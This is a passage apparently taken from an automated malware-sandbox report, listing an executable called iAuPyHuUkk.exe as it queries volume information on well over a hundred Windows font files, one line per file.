            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
